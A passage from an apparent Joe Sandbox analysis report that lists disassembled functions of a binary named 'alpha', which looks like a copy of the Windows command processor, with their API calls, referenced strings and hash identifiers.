                                • Part of subcall function 00007FF744F058D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F05903
                                • Part of subcall function 00007FF744F058D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F05943
                                • Part of subcall function 00007FF744F058D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F05956
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseOpenQueryValueVersion
                              • String ID: %d.%d.%05d.%d
                              • API String ID: 2996790148-3457777122
                              • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                              • Instruction ID: e0beb68cd484ca8b535f3d24e67006b8ef83626aebd86a55c493bcfa728739ea
                              • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                              • Instruction Fuzzy Hash: 61F0A761A0C381C7D710BF56B48006AEBA1FB84780F944134DD4907B9DCF3CD514DB50
                              Function 00007FF744F17854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$ErrorFileFindFirstLast
                              • String ID:
                              • API String ID: 2831795651-0
                              • Opcode ID: 2805b623d85dafeac37338048d009ea01831d7b7e935d07f0051f2b9d413cecc
                              • Instruction ID: 1cd77425b37c6b08bd8c8645a0edaa298067352427de6423cf00bf305d1f88da
                              • Opcode Fuzzy Hash: 2805b623d85dafeac37338048d009ea01831d7b7e935d07f0051f2b9d413cecc
                              • Instruction Fuzzy Hash: 74D16F72A0CA82C6E764BF2694806AAB7B1FB44794F981135DE4E077DCDF3CE941A710
                              Function 00007FF744F189E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: InformationQueryToken
                              • String ID:
                              • API String ID: 4239771691-0
                              • Opcode ID: 2eb98c52454088f6621be3decb0bbaf4861c7b3c1ad5e6b04c37f51bc6bdd8a0
                              • Instruction ID: 40ef3b3b49ec3efabd35ee613b9dfb61de511a3ca25f720935e27f3eed944105
                              • Opcode Fuzzy Hash: 2eb98c52454088f6621be3decb0bbaf4861c7b3c1ad5e6b04c37f51bc6bdd8a0
                              • Instruction Fuzzy Hash: 37115E72608B81DBEB10AF02E5403A9FBA4FB94795F884131DF4802698DB7DE588CB11
                              Function 00007FF744F18114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: FileInformation$HandleQueryVolume
                              • String ID:
                              • API String ID: 2149833895-0
                              • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                              • Instruction ID: de0f0349fb04bdebeb1748ea69282efcd3f4d88bf122094af753c65373f4074a
                              • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                              • Instruction Fuzzy Hash: E511543260C681C6E760AF52F5807AAF7A0F744B44FD85131DE9D52A98DFBCD848DB10
                              Function 00007FF744F28654 Relevance: 3.0, APIs: 2, Instructions: 39timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF744F24227), ref: 00007FF744F28678
                              • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?,?,?,00000000,00007FF744F24227), ref: 00007FF744F286D4
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Time$System$File
                              • String ID:
                              • API String ID: 2838179519-0
                              • Opcode ID: 25a01c1854fc3bb1e488be58593317bdd8222b67c4957b4d1bda725504b33e58
                              • Instruction ID: 50bf7763f4a7c3830e6bb229c258eefdecf29e1fae52aa0efccb7abf19f763ec
                              • Opcode Fuzzy Hash: 25a01c1854fc3bb1e488be58593317bdd8222b67c4957b4d1bda725504b33e58
                              • Instruction Fuzzy Hash: 5311735651C640C6D7209F12E04013AB770FF9CB09B545122FE8D827A8EB3CC942DB19
                              Function 00007FF744F08510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • towupper.MSVCRT ref: 00007FF744F085D4
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                              • String ID:
                              • API String ID: 3520273530-0
                              • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                              • Instruction ID: a2768ceded29e5dd6009a63ea93ffedc8d192624cd624e09ff4786b4370dcf18
                              • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                              • Instruction Fuzzy Hash: 5A61E321A1C642C2F764BF26E188378A6A0FB44754FCC4136DE1E562D9DF3CE894E721
                              Function 00007FF744F1898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: InformationQueryToken
                              • String ID:
                              • API String ID: 4239771691-0
                              • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                              • Instruction ID: 95fdc19920ea6f05779e2a09d993375355acaaf9735f56651973838372d60bab
                              • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                              • Instruction Fuzzy Hash: E0F030B3704B81CBD7009F65E58449CB778F744B84799853ACF2803744DB75D9A4CB50
                              Function 00007FF744F193B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                              Download Yara Rule
                              APIs
                              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F193BB
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                              • Instruction ID: 9d32900cbe115fd0aa5b60027f26d1b51a615cb90d2bebe0b7dd78d7019b5e22
                              • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                              • Instruction Fuzzy Hash: C7B09214E29402D2D708BF229CC10A092A06B58711FC40431C40E802A8DE1C959BD750
                              Function 00007FF744F0F8C0 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 380COMMON
                              Download Yara Rule
                              APIs
                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF744F0F52A,00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F8DE
                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F8FB
                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F951
                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F96B
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0FA8E
                              • _get_osfhandle.MSVCRT ref: 00007FF744F0FB14
                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0FB2D
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0FBEA
                              • _get_osfhandle.MSVCRT ref: 00007FF744F0F996
                                • Part of subcall function 00007FF744F10010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF744F2849D,?,?,?,00007FF744F2F0C7), ref: 00007FF744F10045
                                • Part of subcall function 00007FF744F10010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F2F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F10071
                                • Part of subcall function 00007FF744F10010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F10092
                                • Part of subcall function 00007FF744F10010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F100A7
                                • Part of subcall function 00007FF744F10010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF744F10181
                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F1D401
                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F1D41B
                              • longjmp.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F1D435
                              • longjmp.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F1D480
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                              • String ID: =,;
                              • API String ID: 3964947564-1539845467
                              • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                              • Instruction ID: 2a5d33f45f8a975e3462be7ba45e0b2860d37ac308dfe701158e3c8acbfc360b
                              • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                              • Instruction Fuzzy Hash: C8024721A1D642DAEB14BF63A888579F6A1BF95B55FD88135DD0E462DCDF3CB800E230
                              Function 00007FF744F102A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmp$iswspacewcschr
                              • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                              • API String ID: 840959033-3627297882
                              • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                              • Instruction ID: a7a3926cad63f622b5e07480e75fbd687ff7b18a33b747467252705f04ca9a4a
                              • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                              • Instruction Fuzzy Hash: CCD11921A0C653C6FB50BF63A8C52B9A6A0AF54B44FCC5035DE4D466EEDE3CE905A730
                              Function 00007FF744F0EF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                              Download Yara Rule
                              APIs
                              • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F000
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F031
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F0D6
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigitiswspacewcschr
                              • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                              • API String ID: 1595556998-2755026540
                              • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                              • Instruction ID: 60f23db1074b55738b46015698af482534e18c35ef12af2ec648b0cbc9c1c5a4
                              • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                              • Instruction Fuzzy Hash: BA224B65E0C652D1FB60BF57A4C8279A6A0BF94790FCC9132DE8D422ECDF7CA445A630
                              Function 00007FF744F1081C Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 130COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmp$EnvironmentVariable
                              • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                              • API String ID: 198002717-2301591722
                              • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                              • Instruction ID: 2d9f6c0fe56c044b25443586d567f73ef81c69400b3523f1ea9a2cabe8e7e2d0
                              • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                              • Instruction Fuzzy Hash: 0A51FB25A0C652CAF710BF13A891179EA60BF49B91FCDA035DE0E477D9DF2CE444A760
                              Function 00007FF744F0D3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                              • String ID: "$=,;
                              • API String ID: 3545743878-4143597401
                              • Opcode ID: b3fa525c0aa7c573df7f7b2f39b769da54eaf45f3e5e9f5bf37a15d8f9aec30a
                              • Instruction ID: 21e3da569496386cbc709b3f513a16f814cc054e524ca16a8d95d64cb641c167
                              • Opcode Fuzzy Hash: b3fa525c0aa7c573df7f7b2f39b769da54eaf45f3e5e9f5bf37a15d8f9aec30a
                              • Instruction Fuzzy Hash: 8CC17E65A0D692C2EB657F129084379F6A1BF89F44F8D9035DE4E023DCEF3CE845A621
                              Function 00007FF744F25BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CurrentFormatMessageThread
                              • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                              • API String ID: 2411632146-3173542853
                              • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                              • Instruction ID: 85dad56fef1b0f9d5405bc7de68708128e3ff235be0d7122aad324f5f95eade8
                              • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                              • Instruction Fuzzy Hash: 40616B61A0DA42C2EB64FF52A4941B5A7A0FB48B84FC81136DE0D1779CDF3DF641A720
                              Function 00007FF744F126E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CreateFile_open_osfhandle
                              • String ID: con
                              • API String ID: 2905481843-4257191772
                              • Opcode ID: 3459eb2e79cd0d2b6a799ffdb85acc031fe8388b8b96825e157d57a9e1669ecc
                              • Instruction ID: 746d794112acb6530e2a6ff26cc5ccc8e0a1ade66c8cd796d3da553ef2236f6a
                              • Opcode Fuzzy Hash: 3459eb2e79cd0d2b6a799ffdb85acc031fe8388b8b96825e157d57a9e1669ecc
                              • Instruction Fuzzy Hash: 3B71743260C681CAE760BF56A480679FAA0FB49B61F994234DE5D427D8DF3CD8459B10
                              Function 00007FF744F293E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
